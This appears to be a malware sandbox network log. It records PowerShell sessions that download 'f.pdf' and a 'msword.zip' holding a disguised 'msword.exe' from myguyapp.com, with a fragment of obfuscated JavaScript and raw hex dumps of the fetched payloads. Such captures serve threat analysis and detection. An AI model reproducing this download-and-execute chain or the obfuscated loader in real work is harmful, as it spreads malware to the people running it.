2024-12-11 17:03:04 UTC	3307	IN	Data Raw: 76 61 72 20 6d 3d 62 3b 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 6a 3d 62 2c 65 3d 63 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 66 3d 2d 70 61 72 73 65 49 6e 74 28 6a 28 30 78 31 61 33 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 6a 28 30 78 31 62 31 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 6a 28 30 78 31 61 31 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 6a 28 30 78 31 61 64 29 29 2f 30 78 34 29 2b 70 61 72 73 65 49 6e 74 28 6a 28 30 78 31 61 61 29 29 2f 30 78 35 2b 2d 70 61 72 73 65 49 6e 74 28 6a 28 30 78 31 61 35 29 29 2f 30 78 36 2b 2d 70 61 72 73 65 49 6e 74 28 6a 28 30 78 31 61 63 29 29 2f 30 78 37 2b 2d 70 61 72 73 65 49 6e 74 28 6a 28 30 78 31 39 62 29 29 2f 30 78 38 2b 2d 70 61 Data Ascii: var m=b;(function(c,d){var j=b,e=c();while(!![]){try{var f=-parseInt(j(0x1a3))/0x1(-parseInt(j(0x1b1))/0x2)+parseInt(j(0x1a1))/0x3(parseInt(j(0x1ad))/0x4)+parseInt(j(0x1aa))/0x5+-parseInt(j(0x1a5))/0x6+-parseInt(j(0x1ac))/0x7+-parseInt(j(0x19b))/0x8+-pa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	193.26.115.21	443	7480	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 17:03:07 UTC	162	OUT	GET /f.pdf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: myguyapp.com Connection: Keep-Alive
2024-12-11 17:03:07 UTC	283	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 17:03:07 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 28 Oct 2024 21:28:02 GMT ETag: "4374e-6259024c862cf" Accept-Ranges: bytes Content-Length: 276302 Connection: close Content-Type: application/pdf
2024-12-11 17:03:07 UTC	7909	IN	Data Raw: 25 50 44 46 2d 31 2e 34 0d 0a 25 c2 80 c2 81 c2 82 c2 83 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 20 0d 0a 20 20 20 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 31 20 0d 0a 20 20 20 2f 43 6f 6c 6f 72 53 70 61 63 65 20 33 20 30 20 52 20 0d 0a 20 20 20 2f 48 65 69 67 68 74 20 33 32 38 38 20 0d 0a 20 20 20 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 20 0d 0a 20 20 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 0d 0a 20 20 20 2f 57 69 64 74 68 20 32 35 36 30 20 0d 0a 20 20 20 2f 46 69 6c 74 65 72 20 5b 0d 0a 20 20 20 20 2f 43 43 49 54 54 46 61 78 44 65 63 6f 64 65 20 20 5d 0d 0a 20 20 20 0d 0a 20 20 20 2f 44 65 63 6f 64 65 50 61 72 6d 73 20 5b 0d 0a 20 20 20 20 3c 3c 20 0d 0a 20 20 20 20 20 20 2f 42 6c 61 63 6b 49 73 31 20 74 72 75 65 20 0d 0a 20 20 Data Ascii: %PDF-1.4%1 0 obj<< /BitsPerComponent 1 /ColorSpace 3 0 R /Height 3288 /Subtype /Image /Type /XObject /Width 2560 /Filter [ /CCITTFaxDecode ] /DecodeParms [ << /BlackIs1 true
2024-12-11 17:03:08 UTC	16384	IN	Data Raw: fe f7 fc 8c 7f ff ff 55 fd ef fe df fa 8d 69 3f 7e 71 11 d6 be 97 fd 97 0b fb f1 12 2b 58 a7 56 ab ff 17 fd fe af 65 c1 ff ef ff fa 76 37 ff fd bf d6 d2 5f bf ff ff 7f ff f6 fa f7 bf f9 11 c2 fe f9 15 ac b1 4a ff ea 10 fe ff fc 8b cf fb db f8 fe 43 8e 50 ef 0e fb 7d e9 6f e8 47 4e be 43 13 af ff ff ff ef df d3 f7 7f ad d7 ff df 56 d2 fb 4b 7f bb bd ef bb 6d 7e 41 43 58 a6 b5 aa b0 d6 43 47 10 50 a0 30 bf 7c 8b ab bd f8 30 4a ee 2b 7f 5e b5 e3 f6 bf fb ff 6b da df e9 ee fd af 0d 7f af bf 86 bd 84 e1 a6 bd eb 7c 30 9a 06 55 94 39 14 70 88 98 41 11 da 68 44 44 18 21 11 11 1c 44 7f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c8 09 f0 b8 20 79 01 85 01 0a 9b 25 04 10 79 01 05 d1 7c 8e c8 ec d4 32 5c 50 44 18 04 78 4f 29 95 26 4b 45 3b d1 95 01 b0 a7 20 Data Ascii: Ui?~q+XVev7_JCP}oGNCVKm~ACXCGP0\|0J+^k\|0U9pAhDD!D y%y\|2\PDxO)&KE;
2024-12-11 17:03:08 UTC	16384	IN	Data Raw: ff fc 89 22 97 91 f2 0c c8 90 f3 58 c8 36 48 14 8c 1e 4c 05 04 18 41 90 e0 40 cc c3 00 83 33 0c 02 0c d1 a6 10 71 68 3f d3 4d 6d 3f 91 2d a2 3c 7f 5e 46 f2 0b 12 e4 55 99 39 11 83 22 c2 eb 9b 18 22 28 b1 2a 14 38 86 6a 0a 62 34 82 06 7c 30 08 32 1c 13 04 c1 0c 20 c1 10 20 e1 a1 0e d3 4d 3f 09 da 7f 85 44 47 68 8e 1c 84 bc 97 bf a6 e9 fc b7 30 21 06 29 4e 2d 82 98 59 81 41 11 06 cf 00 c1 03 21 a2 3a 04 18 20 60 98 41 94 06 08 c0 c4 43 04 19 30 08 84 34 2d 34 ed 03 43 40 d5 06 a8 3f 4f 4f d1 08 3e 42 43 44 5b 6d 35 c8 b8 e0 9d 27 84 ea 1f e9 d2 6d f0 40 ca 18 20 c2 74 10 87 84 0c 20 d0 86 10 68 44 35 40 c2 0d 3b 86 83 d3 5c 27 ae ab aa de 88 b8 da 91 df e0 83 70 9d 04 e5 06 43 3d 04 e9 3d 3d 37 5f d3 7f 5a 68 5a 17 c5 a0 ed 38 b0 9a 7f ae 9f c8 dd d2 22 db Data Ascii: "X6HLA@3qh?Mm?-<^FU9""(*8jb4\|02 M?DGh0!)N-YA!: `AC04-4C@?OO>BCD[m5'm@ t hD5@;\'pC===7_ZhZ8"
2024-12-11 17:03:08 UTC	16384	IN	Data Raw: 23 85 e2 a2 98 e2 9a ff 76 bf ab e9 a6 98 54 d0 88 86 08 89 b2 3e 22 19 46 e6 96 be 2b 90 9d d8 e3 63 f7 a7 6b fd a0 c2 6a 9a 0d 34 19 0b 61 08 83 04 0c 12 86 10 88 8e d7 bf 7e d5 3f 4c 26 98 4d 53 54 d3 08 30 9a 11 06 08 30 84 44 68 71 f6 b7 fa a6 43 be a4 c7 08 34 c2 0c 20 64 7b 17 04 22 23 fe 18 55 b4 d3 04 47 52 e0 20 61 08 e1 84 19 19 72 cd c2 a3 88 64 55 94 22 75 31 c4 71 11 6b 11 1f 6b f1 d7 ff ff f7 61 62 3f ff ff ff ff ff ff ff ff ef fa ff ff ff ff fe ff af fe ff ff ff ff ff ff ff ff ff ff ff ff ff 94 c2 9b cb 6d 69 fd ae 5a a6 a1 0e c5 33 b4 0b d9 5d 5d 96 69 f2 3b 32 10 64 71 9a 65 c1 0e 80 dc 20 66 a0 6e 83 5f 0b 96 61 34 50 66 98 21 22 d6 4a b2 c1 90 cd c2 75 93 a0 86 10 83 b4 1f af 5e 59 4c 22 e8 be 47 22 f9 9b 23 99 1d 17 23 38 a0 18 3a 0a Data Ascii: #vT>"F+ckj4a~?L&MST00DhqC4 d{"#UGR ardU"u1qkkab?miZ3]]i;2dqe fn_a4Pf!"Ju^YL"G"##8:
2024-12-11 17:03:08 UTC	16384	IN	Data Raw: f2 46 68 83 fb ff b9 4e ff da ff 0d 87 77 ff 44 63 be bd b4 0c 20 79 a3 77 b5 db 5b 4e ff bf f7 39 3f ff d7 7f ff a7 f1 f1 5e eb b7 ff 9c 2d 07 fa 5f a4 de bf 6b 7f ab 5b b6 17 af ff fe fe fa 5c 8f 9b 46 12 57 6b ee 96 ba ff 56 b6 bd 75 fd ff b6 bb c4 44 97 5b b4 be 18 56 2b fd 76 1a 4d af ff f8 5b 5e c2 5f ef 15 ec 57 fd 6f 1d a5 a6 b7 fb 0c 24 c5 6c 76 ba 4c 3f da 6b f7 e9 a6 3b df fe 3f 6b f4 ba f6 9a 77 f6 dd aa ff fd a6 b6 15 35 4d 06 a4 dc 21 10 61 03 04 3f 5b 4d 06 16 ff 5b 4d 06 84 30 85 a1 11 c4 47 76 ab 0c 10 61 06 10 88 88 88 32 2a 72 39 01 d4 44 68 96 8a 0c e3 82 11 1f c4 47 d7 d2 df f5 d6 98 5e 3d 63 bf ff ff ff ff f9 67 7f ac 7f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd d5 cb 30 28 ce 88 ba 21 b3 a6 50 b2 ce 2f 90 f2 Data Ascii: FhNwDc yw[N9?^-_k[\FWkVuD[V+vM[^_Wo$lvL?k;?kw5M!a?[M[M0Gva2*r9DhG^=cg0(!P/
2024-12-11 17:03:08 UTC	16384	IN	Data Raw: ea 08 c0 a1 7c 8e 9c 56 d5 44 e8 9b d4 33 ba 08 c3 da 87 84 08 7e 11 c4 53 e1 9e 29 91 d6 bc 1e 1a 4f 48 c2 13 a2 86 b2 e3 40 89 58 77 16 92 97 c4 bf 0d 3f c1 1c 7e 47 5d 5e 14 c6 22 61 58 71 42 a8 22 28 e0 fa 4e c2 9b 49 0d b8 c7 61 38 7a a8 6b 30 a1 37 88 20 46 05 8f ae 28 12 d4 47 14 c4 17 08 3d 68 25 a4 21 bc 36 60 6f f7 a0 81 05 98 48 10 b6 5d 62 08 f6 3d 30 aa 12 08 2d 04 1f a0 8a 70 8b ea d1 1d 78 45 0e bf 31 d0 73 3f 08 a1 d7 91 d6 81 11 fd f3 08 63 61 1c 5d 68 21 f1 f7 68 c6 33 c4 4c 75 49 42 07 c4 3b f9 84 2d 50 98 ea 92 84 38 bb fc 28 3a 7f 8d 16 39 87 ce ea d8 df 15 61 a7 6b 58 41 ed 62 85 21 88 4a ac c0 47 57 18 28 df 16 a1 55 c1 11 ee a6 7a 5b 48 a1 dd c4 d3 1b 40 8a f0 e3 d2 08 2e 9d dd d3 48 60 88 f8 6c 11 44 45 3f ee 18 60 c6 a5 44 5a ef Data Ascii: \|VD3~S)OH@Xw?~G]^"aXqB"(NIa8zk07 F(G=h%!6`oH]b=0-pxE1s?ca]h!h3LuIB;-P8(:9akXAb!JGW(Uz[H@.H`lDE?`DZ
2024-12-11 17:03:08 UTC	16384	IN	Data Raw: ad 18 4b 1a 97 ef 54 81 15 08 45 dc fc a5 f3 f9 7c bd 58 8b b9 9f 64 78 f6 5f 30 ab 11 dc cd 18 cc 22 46 5d 35 42 3b 44 34 6a 4d 0a ed 6c 22 46 51 97 eb 73 aa c5 a7 1f ac 68 a3 3a e1 c4 53 b5 b8 84 1d c9 f2 13 d0 4c 64 f9 74 6b 56 35 88 88 88 b1 89 f4 5f 35 f5 88 88 88 be 26 32 0d 0a e3 42 2d 0e e2 44 d1 8e 61 d3 5c d0 58 e6 1f 2d c2 30 84 41 15 07 7c c3 98 70 53 0f 8a 16 b5 43 40 88 e1 4e 71 5f 10 96 61 e9 31 ab 14 a2 3d a0 44 7f 49 53 bb 51 b5 11 0a 35 fd c3 65 4e 47 6c a1 ca 71 8a 69 59 1f 36 81 12 1f 1d 29 74 81 17 59 81 92 22 3f 70 40 8e 3d d8 e3 23 e2 66 8c 69 90 f3 ea ae f2 3d f9 1d 20 45 d2 66 11 7d 06 92 c2 23 e0 8e 39 87 c4 44 64 7e ec 4c 44 3c 4b ac 11 c7 a1 64 7d 6f cf e2 63 3a 21 2f dd c6 47 93 b4 d4 fe 26 10 97 5d e9 9e d5 35 11 2e b3 3d 32 Data Ascii: KTE\|Xdx_0"F]5B;D4jMl"FQsh:SLdtkV5_5&2B-Da\X-0A\|pSC@Nq_a1=DISQ5eNGlqiY6)tY"?p@=#fi= Ef}#9Dd~LD<Kd}oc:!/G&]5.=2
2024-12-11 17:03:08 UTC	16384	IN	Data Raw: 49 82 fd d7 b0 6b 54 ec 35 0e f3 0f 4c bb 60 a1 08 87 ff c3 83 c3 41 b5 62 e2 14 44 f6 f6 20 8a bb 84 71 e5 91 50 33 76 bf 07 f5 f8 3d ce e0 31 8b 62 13 15 34 44 76 a9 82 67 11 84 10 4e da f8 41 60 cc 38 ba c2 67 30 47 1f 61 cb ea b0 44 7d 8a 72 c8 14 1a 4d 8f e1 f6 fd 58 3b a2 64 19 99 27 36 74 e8 24 20 f9 1e 85 40 b8 2d ff 88 82 04 0a 1c 48 fb 74 47 e2 c8 f1 cc df 97 63 15 a0 84 5c b2 16 06 b7 f8 7f 4b e1 f8 22 1a 6c 81 24 3b 6c da 4c 30 92 2e b1 b1 75 08 21 9d d9 84 be 96 6f 43 34 93 23 cd 04 56 43 8d a0 ed b4 58 f1 09 98 ac b2 0b 02 a6 4a 1f ef b7 f4 c1 db 40 88 6d 32 0c e2 c3 15 14 82 0c be 2e 35 e1 b1 06 df 7c 42 2d d4 32 3f 41 02 23 a0 98 b9 cd 30 e1 bb 23 a6 9b 34 56 1b 23 c1 02 cb 20 90 32 bf fb 7e 97 b0 7e 08 3c ba 12 f5 c1 25 4a 7d 67 f0 81 0b Data Ascii: IkT5L`AbD qP3v=1b4DvgNA`8g0GaD}rMX;d'6t$ @-HtGc\K"l$;lL0.u!oC4#VCXJ@m2.5\|B-2?A#0#4V# 2~~<%J}g
2024-12-11 17:03:08 UTC	16384	IN	Data Raw: b1 65 3b 4c 22 a8 7e 82 4d 84 b6 55 b1 15 41 11 f5 ad 2b 45 db 62 3f fe 35 44 1b 47 f2 c7 ff ff d7 ef 75 69 76 c4 42 36 bb 47 d4 e2 8f 6d b5 a4 20 c5 bc 48 e8 20 56 91 71 22 c2 1a 08 8f 98 df b8 52 6c c2 4d 7e 6a 83 1f bb fe dd 57 5f af fe b6 61 18 52 87 17 fa 4c a1 ca 78 30 84 45 bc fa 35 60 98 ff c9 0e 11 1d 36 6e 50 87 09 94 e0 8c 20 60 88 fa 2a 02 23 8a 08 13 68 11 1d 38 61 c2 23 ab 5f 6f 91 5c ce a2 e8 1a d9 27 20 90 4d d5 89 83 85 fa aa fa b0 d0 9c 71 10 69 af 4b 8b 89 f4 46 40 8a 78 dc 34 11 a6 db bd 53 e3 4c 5e 21 82 c2 87 16 08 12 4c 57 04 0b 68 11 43 82 0b b1 55 fb 63 b1 15 50 85 8d 3f 5a 5d 69 7e 1c 54 83 71 fd 28 5c 44 f3 48 be b6 47 44 74 48 d5 a6 50 7e f5 47 74 22 50 85 13 1e a5 d0 de 9a 29 d3 08 8f bf 0c 63 1e bf 4b 7f 08 84 82 f8 83 8f b4 Data Ascii: e;L"~MUA+Eb?5DGuivB6Gm H Vq"RlM~jW_aRLx0E5`6nP `*#h8a#_o\' MqiKF@x4SL^!LWhCUcP?Z]i~Tq(\DHGDtHP~Gt"P)cK
2024-12-11 17:03:08 UTC	16384	IN	Data Raw: a2 3c e6 31 d4 47 1f b8 43 88 9c 88 e8 61 28 4e b1 04 12 77 f0 43 42 d1 1f 2f 18 c9 09 36 ed b1 23 a4 11 84 69 0f 06 60 52 3c 5f b3 e8 20 42 67 62 4e a9 6a a0 d0 60 ef f9 f4 26 d2 16 ea 7b 1d de 82 c2 55 36 2f a5 17 46 d0 d9 c4 9b ae c2 53 0f 0c 11 d3 bf a5 31 89 3f 6e 3b b6 2d 0c 8b 77 61 17 04 23 ae 82 2d d0 30 40 99 1d 62 a8 a1 e2 90 eb 8a 97 49 36 de af f0 fc 5f 3f 07 51 39 8a 25 62 f8 a1 41 06 2e c4 44 c4 0a 48 7b 09 23 12 d8 dd ee e8 23 49 8b 10 65 20 af 28 76 25 fc 8f 03 1f 08 32 a0 32 3a 96 e9 5b a3 e8 9e a0 8e 82 de 5e 11 5b a6 ce 27 f5 4c 4c 2b 73 71 8b 3c fd a3 da d9 1d be 82 65 00 90 f1 10 46 81 82 05 f6 a1 04 08 32 3a 05 4e 92 16 c4 ba 38 ae fc 52 23 ab 34 b4 82 46 12 2b 2a 37 6d 37 2a 22 14 61 38 6d 21 c3 d4 21 17 2e d8 49 1c d0 42 14 3b ee Data Ascii: <1GCa(NwCB/6#i`R<_ BgbNj`&{U6/FS1?n;-wa#-0@bI6_?Q9%bA.DH{##Ie (v%22:[^['LL+sq<eF2:N8R#4F+7m7"a8m!!.IB;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49735	193.26.115.21	443	7764	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 17:03:13 UTC	167	OUT	GET /msword.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: myguyapp.com Connection: Keep-Alive
2024-12-11 17:03:14 UTC	285	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 17:03:14 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 29 Oct 2024 16:49:11 GMT ETag: "3a0583-625a05d5cdaa6" Accept-Ranges: bytes Content-Length: 3802499 Connection: close Content-Type: application/zip
2024-12-11 17:03:14 UTC	7907	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 05 ab 5c 59 89 46 99 25 0d 05 3a 00 f7 ff 1f 35 0a 00 00 00 6d 73 77 6f 72 64 2e 65 78 65 ec bd 7f 7c 54 c5 b9 3f 7e f6 47 c2 92 6c d8 45 12 0c 1a 34 42 50 94 1f 8d 2e 28 71 41 17 c8 09 d1 b2 b8 b8 66 17 94 00 2a c4 c3 8a 40 c9 39 fc 68 89 26 9c a4 b2 1e d6 5a 6b 6f b5 b5 b7 a6 d8 5b db da 4a 5b 2b 51 11 13 40 12 94 5a 14 2e a6 05 af 11 a9 ce ba 51 57 89 61 81 c8 f9 bc 9f 99 dd 10 b8 b6 bd 9f cf eb 7e ff fb 06 67 cf 9c 39 cf cc 3c f3 cc f3 73 66 ce d1 7f fb 23 92 4d 92 24 3b 92 69 4a 52 8b 24 fe 7c d2 bf fe db 8f 34 e4 d2 97 86 48 cf 0f fe f3 65 2d 96 d9 7f be ec 36 65 59 6d f1 aa d5 2b ef 59 7d e7 7d c5 77 df b9 62 c5 4a b5 f8 ae a5 c5 ab b5 15 c5 cb 56 14 97 df 12 2c be 6f e5 92 a5 13 f3 f2 72 4a d2 6d 4c ff ce 5b f7 66 5d Data Ascii: PK\YF%:5msword.exe\|T?~GlE4BP.(qAf*@9h&Zko[J[+Q@Z.QWa~g9<sf#M$;iJR$\|4He-6eYm+Y}}wbJV,orJmL[f]
2024-12-11 17:03:14 UTC	16384	IN	Data Raw: 56 85 d9 33 a3 08 bd c4 85 18 67 11 1f e7 f7 bf ca 60 3f 48 ff d4 ea 3d 51 fb 77 9a 66 52 54 de 13 ab 57 f0 78 9b 1c 75 f6 d1 78 be 62 7e 75 1a e1 bb c7 d0 e6 33 3f 2e 32 0f 59 b0 84 5b cf 7b 96 d4 20 bb f7 12 f2 2d d0 77 11 bb 18 c3 62 9b d0 83 59 b0 1b b3 54 06 28 57 e3 27 84 2d 6d fe 71 3c 7f 7f 19 c5 1b 66 c1 d3 34 36 07 1f db 68 34 28 f4 63 30 b3 2b ab be 58 15 14 72 12 14 c7 52 6a ca 26 10 1e 5a 6e 1a 9f 03 25 12 b5 57 24 4e 06 bc 56 42 67 31 88 c3 1c ab 70 fb 02 6e 23 17 2d da c1 a0 7f f8 19 43 73 6b 31 29 61 f6 c4 78 71 ee a3 41 e0 a6 de 18 b1 84 14 52 ec 66 c1 53 f5 bc df 09 55 21 76 a8 54 ca 54 2b e1 d5 ee a2 6a ec df 30 51 de d7 d4 dc b4 24 11 09 6a cc 2c ea f0 16 ed 89 aa 20 fb 19 aa c5 cf 80 39 ca 26 d0 2a a6 fa 9d 88 8d 5d 0a ce 8e d8 8d 4e Data Ascii: V3g`?H=QwfRTWxuxb~u3?.2Y[{ -wbYT(W'-mq<f46h4(c0+XrRj&Zn%W$NVBg1pn#-Csk1)axqARfSU!vTT+j0Q$j, 9&*]N
2024-12-11 17:03:14 UTC	16384	IN	Data Raw: ce 1d 83 46 b1 f2 54 b9 9e 4e 71 9d 6a 2d c6 ef 7d 69 7c 91 bb 91 53 be 42 e2 a3 03 11 c3 d0 d7 54 67 d7 39 17 bf 9a 5d fc b1 33 24 71 6a fb 4b 5f c6 9d a8 e2 12 63 c5 15 f3 ae 6b e7 1f 75 09 73 5d ba f8 d1 66 78 27 b5 6f 51 22 07 81 9c b6 b7 53 ae 42 ab 7a 20 3f 20 f1 0d e7 5c d9 fc 1d b7 b3 6b dc f3 5f fb 37 39 03 57 ac 2a de 97 de 5a 52 d0 5d 63 6a b8 58 3f 56 7e 35 6d 1b 3e 81 2f d0 8f 48 d4 da 3e d5 be 5e af b5 7a 3a ed 75 f8 93 6d 8e 1a c4 5f 82 9f 2b dc a2 3c 43 f2 a4 30 47 b4 8d ef 8e 9a db dd d1 11 df 1e cd 9f d3 1d 2c b9 39 62 7e 2c 36 8b c6 20 79 fb 8e d6 e1 a6 09 a5 15 4b 3d 58 c2 8f 8a cf 46 77 2b 8a 1b c0 75 39 1d a3 e5 ee e9 bc 1a e2 7c 1e 5c cd c0 74 7c cf 83 1f 6e b5 41 2b df 1c 0c 8a 3b 38 be 04 47 92 17 7d f5 df 1e 74 b3 3a 75 43 b0 cb Data Ascii: FTNqj-}i\|SBTg9]3$qjK_ckus]fx'oQ"SBz ? \k_79W*ZR]cjX?V~5m>/H>^z:um_+<C0G,9b~,6 yK=XFw+u9\|\t\|nA+;8G}t:uC
2024-12-11 17:03:14 UTC	16384	IN	Data Raw: 93 60 7c 07 2b fd 2b 71 34 1d 1b b7 95 de 6d a8 d1 45 6c d2 7d 90 60 6e e4 d0 fb 59 98 e6 a7 b1 47 af bd f9 91 fe 7d 93 c8 34 a3 7c be bf a9 8b e0 f0 58 d4 f2 63 e3 a6 12 a8 49 60 db 1d 05 fc c4 df 2a bd 75 cf ac e2 8b fa 54 55 91 f5 75 4a 85 a3 44 b9 d4 d2 df 9e 3d d6 cd 4c 30 ac fb 65 88 e8 ad 62 79 9f a3 cd 1e 80 b5 f8 1f 45 c5 2b 26 1f 64 d8 20 21 74 57 6d 68 8f 70 29 c2 c6 ab b6 e7 02 62 d2 9c 41 27 59 c6 f9 52 39 04 51 f6 1c f1 aa c7 58 a5 18 64 48 94 0d 13 56 b6 cd dd 60 ca 70 40 85 2e 96 d0 d5 85 d1 d5 45 d1 d5 69 5c 18 3c 58 66 c8 26 32 38 33 21 96 0b 85 f1 a9 00 4b a9 44 51 92 2d b8 8a 4d 8a ee 7b b3 8e 22 16 09 ea 03 29 00 79 83 c1 1a e8 5a 23 7c 42 78 25 67 e3 63 15 6c 06 58 47 e9 95 97 25 f1 f3 35 5e 21 c7 09 0d d9 56 cf 71 54 84 a3 02 70 1f Data Ascii: `\|++q4mEl}`nYG}4\|XcI`*uTUuJD=L0ebyE+&d !tWmhp)bA'YR9QXdHV`p@.Ei\<Xf&283!KDQ-M{")yZ#\|Bx%gclXG%5^!VqTp
2024-12-11 17:03:14 UTC	16384	IN	Data Raw: f9 b4 5f c7 58 37 b2 67 8f bf fc 08 56 d9 81 6d 04 63 79 f0 2f 7b 2a e2 2c 53 ba 09 64 06 3e e1 91 2b 5a b9 98 92 50 bd 80 bc 92 de 2e 1d 0e 07 79 b2 c7 6e d3 46 d8 40 cc c7 5d c4 77 de 35 60 24 4e bc f5 c9 0a 16 61 c5 65 0a b5 e3 18 3e 51 b0 5a 90 14 d8 10 95 c8 8e f9 c5 63 43 c0 f3 c4 b6 8e aa 13 af 9f fd e8 35 9e 21 ef 3b d1 ed 88 4e 48 44 70 57 27 1b bd 2f 9b 5e df de 69 aa 7e 00 da f6 8a 45 91 be ee 3c e7 2c 1b f1 d4 ff 4b 16 df 42 5b 5b 11 fe 91 e5 3b 55 46 34 6f b0 f0 e5 54 e4 42 70 d6 b9 c3 a8 d0 fe 4e f9 e3 11 75 34 1f c6 99 aa 3a c2 a5 fe 6c bc c6 f8 35 8d 62 01 ec 3a 9e 96 cb 81 6c 73 cb aa 34 29 f3 15 3d 34 a5 ea 29 97 56 6a 41 c2 c4 6e 9a 10 26 a2 e6 1c d6 f3 28 b0 dd ae b1 17 67 1d be 89 c2 e6 81 54 bc 6f bf 81 7a b6 bc f5 5f 9d b5 15 da a6 Data Ascii: _X7gVmcy/{*,Sd>+ZP.ynF@]w5`$Nae>QZcC5!;NHDpW'/^i~E<,KB[[;UF4oTBpNu4:l5b:ls4)=4)VjAn&(gToz_
2024-12-11 17:03:14 UTC	16384	IN	Data Raw: 53 2f 24 2c 11 25 a5 75 42 9f ba 65 2a d8 59 b6 9f cc 8b 06 bd f4 bf c0 72 ed 69 97 5c 2f 66 35 40 2e fe d0 44 fa f3 fa 15 f1 98 0f d6 3f 75 25 87 af 9f 71 cb f4 65 55 36 b3 0f e4 bf 16 3e eb bd a2 a1 03 88 6c 47 de 8d 16 85 a2 03 f7 ea 0f d2 5d 3f 05 6b 75 52 03 76 4e 82 9f 7e 8f 25 f8 1b f6 a6 15 d7 0f ae 56 fb 1c 4b fe ca 9d d1 30 87 8c 5a e8 01 71 87 3b 38 62 22 82 11 dd cd c6 85 a7 b5 d0 9c 81 9c a4 08 49 9e 31 d7 37 84 71 67 85 4f 60 56 e9 cc a0 3d 3d 35 a8 31 c8 46 87 2c 07 4a 29 9b 06 f5 76 de 9a 00 75 bf 82 68 9e 96 1c 0b b5 61 e2 42 2b 44 8f 6b af 55 7d 7b 09 70 cb 22 60 53 f1 50 ca 93 e8 e1 d5 af 35 50 d9 28 8b 73 1f 21 20 ac 06 42 0c c4 07 34 43 32 c4 d0 8e 5c 88 8d 58 fb e2 99 f7 e5 23 5c dc f7 13 4c b1 d2 cd e0 c7 f6 d3 e9 e6 6b be 26 87 ec Data Ascii: S/$,%uBe*Yri\/f5@.D?u%qeU6>lG]?kuRvN~%VK0Zq;8b"I17qgO`V==51F,J)vuhaB+DkU}{p"`SP5P(s! B4C2\X#\Lk&
2024-12-11 17:03:14 UTC	16384	IN	Data Raw: b6 88 82 7a 44 8a 25 9b 38 0b 1b f5 8b 83 6d c3 42 b2 f4 78 a4 ee ab 2a 25 99 99 79 af ec e9 c5 ef 7b fc d7 0c 94 83 97 24 f9 7e 7f d8 f2 a8 0a f4 9c 72 0c 7b 79 7f f1 51 5f d1 83 82 b4 21 fa e3 93 7c 8f 83 26 14 95 cf 3d 37 4d 61 71 af fe c7 50 41 e9 f1 17 08 7f b3 42 c1 d3 d5 c3 69 77 27 64 7b bd ba 3b 45 8a 05 d2 e0 c0 0d b2 a6 7b 97 59 3f da ae 1a 6c 81 46 e0 da 93 fe d4 36 57 0d b2 14 1a d3 65 01 f5 28 5b d6 ed a9 65 73 a6 bd f2 bf c3 ef ba 4b 95 a3 8d df 42 92 a0 40 3d 81 1e 42 bc 0c 5c af f1 42 0b 98 1a 04 4d 4a 92 38 f1 c0 3b 4d e0 5e 14 08 fc 68 bf b1 1e 80 cb 6a ef 3f e6 20 5a 09 01 86 c5 10 28 38 0a 29 08 dd 5a be 5b f5 19 86 b2 a7 b7 06 5c 10 f7 8d a1 07 f9 17 5f 08 af 48 4c 3f 41 89 41 08 6c 98 a7 a8 00 0d cd ac 7f 10 82 d3 b8 ce 5c 06 79 b2 Data Ascii: zD%8mBx*%y{$~r{yQ_!\|&=7MaqPABiw'd{;E{Y?lF6We([esKB@=B\BMJ8;M^hj? Z(8)Z[\_HL?AAl\y
2024-12-11 17:03:14 UTC	16384	IN	Data Raw: 0d c6 fc 81 53 e3 a2 bb ae ce bd 5a 7f 5b 5c 40 7f a4 29 1f 32 7c 35 25 f2 e4 f9 73 14 63 6b a7 6f 26 45 9f ac 2d 4e 76 27 44 7f 9a cf 2a 7a 76 df e8 f2 8b 34 86 cf c7 34 60 55 3f 8f f3 7d 7d 57 67 ea 5b 28 4b 6e ae fb e2 e7 29 e7 c7 75 ae e9 97 7b be 54 d2 d5 31 8b 00 89 f5 5b 3a 35 32 b1 69 0d 8c 07 bc a3 68 62 88 f7 ee f5 88 0f e6 fa 11 df 44 e2 51 cd 63 ee 28 02 5d e0 27 be 1a 34 04 f0 2c fb 7c 9e f8 46 bb bc e1 db db 7d d1 0c ff 21 60 68 46 a4 2c b6 b8 6d fa d7 48 45 67 c0 d4 8c d9 ac 43 d9 80 0f 97 b7 da b4 db 10 92 43 1a ef 47 f1 71 f4 89 9a 59 78 d5 f0 b6 f4 60 e2 58 78 81 d4 23 61 71 fe c6 10 f7 fc f4 87 ed 67 b5 03 93 4f 2f 8c e6 1f 8e bd a0 cf 2c c0 4d 54 1f 61 2c 28 89 ba 24 6a a8 91 f4 d9 3a 4b f6 aa f5 31 8a dd 86 92 a2 97 f4 b5 0a eb c4 b6 Data Ascii: SZ[\@)2\|5%scko&E-Nv'D*zv44`U?}}Wg[(Kn)u{T1[:52ihbDQc(]'4,\|F}!`hF,mHEgCCGqYx`Xx#aqgO/,MTa,($j:K1
